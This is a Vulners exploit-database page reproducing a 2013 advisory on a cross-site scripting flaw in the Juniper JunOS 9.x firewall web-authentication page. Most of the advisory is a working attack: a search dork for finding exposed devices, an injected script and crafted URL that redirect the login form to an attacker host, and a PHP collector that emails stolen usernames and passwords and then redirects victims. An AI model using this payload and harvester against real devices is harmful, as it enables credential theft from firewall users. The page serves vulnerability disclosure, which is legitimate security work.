Vulners
Lucene search
Juniper JunOS 9.x Cross Site Scripting
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2014-3821 | 11 Jul 201420:00 | – | cve |
 | CVE-2014-3821 | 11 Jul 201420:00 | – | cvelist |
 | EUVD-2014-3759 | 7 Oct 202500:30 | – | euvd |
 | Juniper Junos SRX Series Web Authentication XSS (JSA10640) | 15 Jul 201400:00 | – | nessus |
 | CVE-2014-3821 | 11 Jul 201420:55 | – | nvd |
 | Juniper Networks Junos OS Web Authentication XSS Vulnerability | 31 Jul 201400:00 | – | openvas |
 | Cross site scripting | 11 Jul 201420:55 | – | prion |
`Exploit Title: Juniper JUNOS 9.X HTML Injection Vulnerability
Google Dork: intext:"2009, Juniper Networks" intext:"Firewall User Web-Authentication"
Date: Jul 24th 2013
Exploit Author: Andrea Menin (linkedin.com/in/andreamenin)
Vendor Homepage: http://www.juniper.net
Version: JUNOS 9.X
Tested on: Firefox 22.0
Description:
------------
The Juniper Firewall has a PHP authentication and authorization
page for using ports and services that usually are not enabled.
The page contains a html form that sends authentication requests
to the following url:
"https:/<ip>/?target=&auth_id=&ap_name="
Looking at this URL we can see that, along with your username
and password, will be sent the variables $target, $auth_id and
$ap_name. The contents of these variables is placed in the
destination URL of the html form ("action" argument), so
injecting HTML code into these variables can change the form,
and you can change the "action" parameters for collect username
and password on external page.
Exploit:
--------
The exploit consists on injecting DOM functions for
replace the "action" parameters into the tag <form>
with an external URL that will collects username
and password used by the users. You can use the
DOM function "setAttribute" for replace the "action"
parameters, like this script:
<script>
var f = document.getElementsByTagName('form')[0];
f.setAttribute('action', 'http://i.am.a.bad.boy.xy/fuck.php');
</script>
Exploit URL:
https://<firewall ip>/?target=&auth_id=&ap_name=%22%3E%3Cscript%3Edocument.getElementsByTagName%28%27form%27%29[0].setAttribute%28%27action%27,%20%27http://i.am.a.bad.boy.xy/fuck.php%27%29%3C/script%3E%3Ca%20href=%22
url-decoded, appears like this:
https://<firewall ip>/?target=&auth_id=&ap_name="><script>document.getElementsByTagName('form')[0].setAttribute('action', 'http://i.am.a.bad.boy.xy/fuck.php')</script><a href="
The PHP script "fuck.php" will receive, via POST http request,
the username and password. I've write this exploit that sends
me an email when a new username and password received, and then
redirect the users to the original firewall's login page.
<?php
// send me your password
mail(
'[email protected]',
'new juniper password',
"user: ".$_POST['username']."\npass: ".$_POST['password']."\n\n",
"From: Jesus <[email protected]>\n"
);
// taking user to home
header("Location: https://10.0.0.1");
?>
have fun.
--
Andrea (aka und3r) Menin
menin.andrea [at] gmail.com
linkedin.com/in/andreamenin
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jul 2013 00:00Current
6.7Medium risk
Vulners AI Score6.7
EPSS0.00257